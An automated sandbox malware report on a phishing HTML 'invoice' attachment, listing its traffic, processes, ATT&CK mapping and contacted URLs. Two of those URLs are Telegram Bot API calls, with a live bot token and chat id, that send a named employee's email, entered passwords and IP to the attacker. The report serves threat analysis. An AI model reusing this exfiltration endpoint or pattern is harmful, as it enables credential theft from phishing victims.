      Source: global trafficHTTP traffic detected: GET /v2/track HTTP/1.1Host: dc.services.visualstudio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: quiltercheviot.com
      Source: global trafficDNS traffic detected: DNS query: ipinfo.io
      Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: dns.google
      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
      Source: global trafficDNS traffic detected: DNS query: www.quiltercheviot.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cloud.typography.com
      Source: global trafficDNS traffic detected: DNS query: cc.cdn.civiccomputing.com
      Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
      Source: global trafficDNS traffic detected: DNS query: apikeys.civiccomputing.com
      Source: global trafficDNS traffic detected: DNS query: dc.services.visualstudio.com
      Source: unknownHTTP traffic detected: POST /ccm/collect?en=page_view&dl=https%3A%2F%2Fwww.quiltercheviot.com%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=1741727636.1742906944&dt=Quilter%20Cheviot&auid=367376048.1742906944&navt=n&npa=0&gtm=45He53l1h1v76305953za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=102482433~102788824~102803279~102813109&tft=1742906943944&tfd=4534&apve=1 HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://www.quiltercheviot.comX-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49696 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49700 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49697 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.138.106.26:443 -> 192.168.2.16:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.138.106.63:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.14.68:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.16:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.16:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.35.231:443 -> 192.168.2.16:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 173.222.103.192:443 -> 192.168.2.16:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.152.25:443 -> 192.168.2.16:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.152.25:443 -> 192.168.2.16:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.8.54:443 -> 192.168.2.16:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.16:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.16:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.22.38.92:443 -> 192.168.2.16:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.22.39.92:443 -> 192.168.2.16:49791 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.179.73.37:443 -> 192.168.2.16:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.188.247.147:443 -> 192.168.2.16:49795 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49805 version: TLS 1.2

      System Summary

      barindex
      Source: Name includes: Invoice_charles.mesquita_PaymentUpdate.htmlInitial sample: invoice
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6292_1387746061
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6292_1387746061
      Source: classification engineClassification label: mal84.phis.troj.winHTML@22/35@48/294
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Invoice_charles.mesquita_PaymentUpdate.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,11913174507900724838,10422298326975698631,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,11913174507900724838,10422298326975698631,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected

      Stealing of Sensitive Information

      barindex
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions      		1
      Process Injection      		1
      Masquerading      		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Web Service      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Extra Window Memory Injection      		1
      Process Injection      		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion      		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Extra Window Memory Injection      		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
      Ingress Tool Transfer      		Scheduled TransferData Encrypted for Impact

      Screenshots

      Download Video

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html0%Avira URL Cloudsafe
      https://logo.clearbit.com/quiltercheviot.com?size=8000%Avira URL Cloudsafe
      https://quiltercheviot.com/0%Avira URL Cloudsafe
      https://dns.google/resolve?name=quiltercheviot.com&type=MX0%Avira URL Cloudsafe
      https://api.telegram.org/bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20First%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com0%Avira URL Cloudsafe
      https://api.telegram.org/bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20Second%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%94%91%20Password%202%3A%20RUBBISH%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com0%Avira URL Cloudsafe
      https://cloud.typography.com/6419036/6235832/css/fonts.css0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.200370%Avira URL Cloudsafe
      https://www.quiltercheviot.com/4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=270&height=260&quality=20&rmode=crop&format=jpeg0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qc_primary_logo_stkdleft1_rgb72.svg0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/0%Avira URL Cloudsafe
      https://cdnjs.cloudflare.com/ajax/libs/jsrender/1.0.6/jsrender.min.js0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/Content/images/v3/themes/qc/chevron.svg0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/Content/images/v3/svg-sprite.svg0%Avira URL Cloudsafe
      https://apikeys.civiccomputing.com/c/v?d=www.quiltercheviot.com&p=CookieControl%20Custom&v=9&k=98b7657ff42ad3428720295cb98d24e45c67bfd7&format=json0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/scripts/global-v3.js?v=2.5.0.200370%Avira URL Cloudsafe
      https://cc.cdn.civiccomputing.com/9/cookieControl-9.9.2.min.js0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/Content/images/v3/themes/qc/chevron-white.svg0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/Content/images/v3/themes/qc/success.svg0%Avira URL Cloudsafe
      https://js.monitor.azure.com/scripts/b/ai.2.gbl.min.js0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/api/rolesandregions/getroles/0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qc-secondary-logo.svg0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/Content/Fonts/866831/B4C49007D12296CAC.css0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/api/message/getall/0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/Util/Find/epi-util/find.js0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/api/rolesandregions/getroles/?pageLink=https%3A%2F%2Fwww.quiltercheviot.com%2F0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qcfavicon512x512.png0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=539&height=520&quality=70&rmode=crop&format=jpeg0%Avira URL Cloudsafe
      https://www.quiltercheviot.com/Content/images/v3/themes/qc/information.svg0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0012.t-0009.t-msedge.net
      		13.107.246.40
      		truefalse
        		high
        www.quiltercheviot.com.cdn.cloudflare.net
        		104.18.35.231
        		truefalse
          		unknown
          cc-cdn.civiccomputing.com.cdn.cloudflare.net
          		172.67.8.54
          		truefalse
            		high
            quiltercheviot.com
            		217.114.85.70
            		truefalse
              		unknown
              gig-ai-g-prod-eastus-7-app-v4-tag.eastus.cloudapp.azure.com
              		52.179.73.37
              		truefalse
                		unknown
                apikeys.civiccomputing.com.cdn.cloudflare.net
                		104.22.38.92
                		truefalse
                  		high
                  dns.google
                  		8.8.4.4
                  		truefalse
                    		high
                    d26p066pn2w0s0.cloudfront.net
                    		108.138.106.26
                    		truefalse
                      		high
                      ipinfo.io
                      		34.117.59.81
                      		truefalse
                        		high
                        cdnjs.cloudflare.com
                        		104.17.25.14
                        		truefalse
                          		high
                          gig-ai-g-prod-eastus-6-app-v4-tag.eastus.cloudapp.azure.com
                          		52.188.247.147
                          		truefalse
                            		unknown
                            www.google.com
                            		172.217.14.68
                            		truefalse
                              		high
                              e7100.g.akamaiedge.net
                              		173.222.103.192
                              		truefalse
                                		high
                                api.telegram.org
                                		149.154.167.220
                                		truefalse
                                  		high
                                  cloud.typography.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    js.monitor.azure.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      cc.cdn.civiccomputing.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        apikeys.civiccomputing.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          dc.services.visualstudio.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            logo.clearbit.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              www.quiltercheviot.com
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                https://www.quiltercheviot.com/Content/images/v3/svg-sprite.svgfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dns.google/resolve?name=quiltercheviot.com&type=MXfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.quiltercheviot.com/scripts/global-v3.js?v=2.5.0.20037false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.quiltercheviot.com/Content/images/v3/themes/qc/chevron.svgfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://js.monitor.azure.com/scripts/b/ai.2.gbl.min.jsfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.quiltercheviot.com/api/rolesandregions/getroles/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.quiltercheviot.com/Content/images/v3/themes/qc/chevron-white.svgfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://apikeys.civiccomputing.com/c/v?d=www.quiltercheviot.com&p=CookieControl%20Custom&v=9&k=98b7657ff42ad3428720295cb98d24e45c67bfd7&format=jsonfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cc.cdn.civiccomputing.com/9/cookieControl-9.9.2.min.jsfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qc_primary_logo_stkdleft1_rgb72.svgfalse
